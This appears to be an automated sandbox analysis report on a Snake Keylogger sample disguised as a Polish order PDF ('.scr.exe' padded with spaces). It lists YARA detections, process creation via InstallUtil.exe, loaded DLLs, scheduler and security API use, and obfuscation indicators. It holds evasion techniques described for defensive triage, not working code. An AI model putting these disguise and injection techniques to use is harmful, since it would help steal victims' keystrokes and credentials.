Source: 00000002.00000002.2547215169.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000002.00000002.2547215169.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1616198449.000002C69A86A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1616198449.000002C69A86A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: zam#U00f3wienie 12832025_pdf .scr.exe PID: 2360, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: zam#U00f3wienie 12832025_pdf .scr.exe PID: 2360, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: InstallUtil.exe PID: 5604, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: InstallUtil.exe PID: 5604, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a33a0000.8.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a33a0000.8.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a33a0000.8.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a33a0000.8.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a73a2e8.3.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a73a2e8.3.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a33a0000.8.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a33a0000.8.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a73a2e8.3.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a33a0000.8.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a73a2e8.3.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a73a2e8.3.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a33a0000.8.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a73a2e8.3.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/0@1/2

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\02d2452a-bbe6-4095-8235-43a0b23071e1

Jump to behavior

Source: zam#U00f3wienie 12832025_pdf .scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: zam#U00f3wienie 12832025_pdf .scr.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: zam#U00f3wienie 12832025_pdf .scr.exe

Virustotal: Detection: 19%

Source: unknown	Process created: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe "C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe"
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5604 -s 1424
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: zam#U00f3wienie 12832025_pdf .scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: zam#U00f3wienie 12832025_pdf .scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdbJ! source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tallUtil.pdb source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1616198449.000002C69A711000.00000004.00000800.00020000.00000000.sdmp, zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619439795.000002C6A33A0000.00000004.08000000.00040000.00000000.sdmp, zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.PDB source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1616198449.000002C69A711000.00000004.00000800.00020000.00000000.sdmp, zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619439795.000002C6A33A0000.00000004.08000000.00040000.00000000.sdmp, zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1616198449.000002C69A78A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.pdb0 source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619250720.000002C6A3350000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: InstallUtil.pdbH source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdbx! source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.PDB source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: zam#U00f3wienie 12832025_pdf .scr.exe, 00000000.00000002.1619250720.000002C6A3350000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: !til.pdb source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb ( source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.PDBp source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdbwork64/v4.0.30319/InstallUtil.exe source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\InstallUtil.pdb` source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: til.pdb source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: 8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\InstallUtil.pdbH2; source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbt! source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: pC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.PDB source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000002.00000002.2547904821.00000264286EE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windo.pdb" source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\InstallUtil.pdb2 source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdbO24 source: InstallUtil.exe, 00000002.00000002.2549494453.00000264428F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.0.30319\InstallUtil.pdbd source: InstallUtil.exe, 00000002.00000002.2547404110.000000FF255F2000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb~ source: InstallUtil.exe, 00000002.00000002.2547904821.00000264286EE000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: zam#U00f3wienie 12832025_pdf .scr.exe, DecoratorProgram.cs	.Net Code: ConvertExtendedConverter System.Reflection.Assembly.Load(byte[])
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a3350000.7.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a3350000.7.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a3350000.7.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a3350000.7.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a3350000.7.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a78a320.2.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a33a0000.8.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a33a0000.8.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a33a0000.8.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a73a2e8.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a73a2e8.3.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c69a73a2e8.3.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a3280000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a3280000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1619061673.000002C6A3280000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1607652560.000002C68A7C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: zam#U00f3wienie 12832025_pdf .scr.exe PID: 2360, type: MEMORYSTR

Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Code function: 0_2_00007FF7C814914C push esi; retf	0_2_00007FF7C8149153
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Code function: 0_2_00007FF7C8145921 pushad ; retf	0_2_00007FF7C814592D
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Code function: 0_2_00007FF7C82E0F9E push edi; iretd	0_2_00007FF7C82E0FA0
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	Code function: 0_2_00007FF7C82E0426 push ds; retf	0_2_00007FF7C82E0427

Source: 0.2.zam#U00f3wienie 12832025_pdf .scr.exe.2c6a3110000.4.raw.unpack, obqYaYto1AnqSHkB03k.cs

High entropy of concatenated method names: 'Qpst4hLC8Y', 'uYet5DtuUP', 'hSAtAlKiaV', 'Jrut2yNB1O', 'AoBtnhXSPk', 'TLVteUfJh5', 'GpftV1iVvA', 'pqEtlQ83ho', 'eLBt8PcGP4', 'UTUtS3NRT0'

Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	File created: \zam#u00f3wienie 12832025_pdf .scr.exe
Source: C:\Users\user\Desktop\zam#U00f3wienie 12832025_pdf .scr.exe	File created: \zam#u00f3wienie 12832025_pdf .scr.exe			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses an obfuscated file name to hide its real file extension (a lot of spaces)

Source: Detected 45 consecutive spaces in filename

Static PE information: zam#U00f3wienie 12832025_pdf .scr.exe

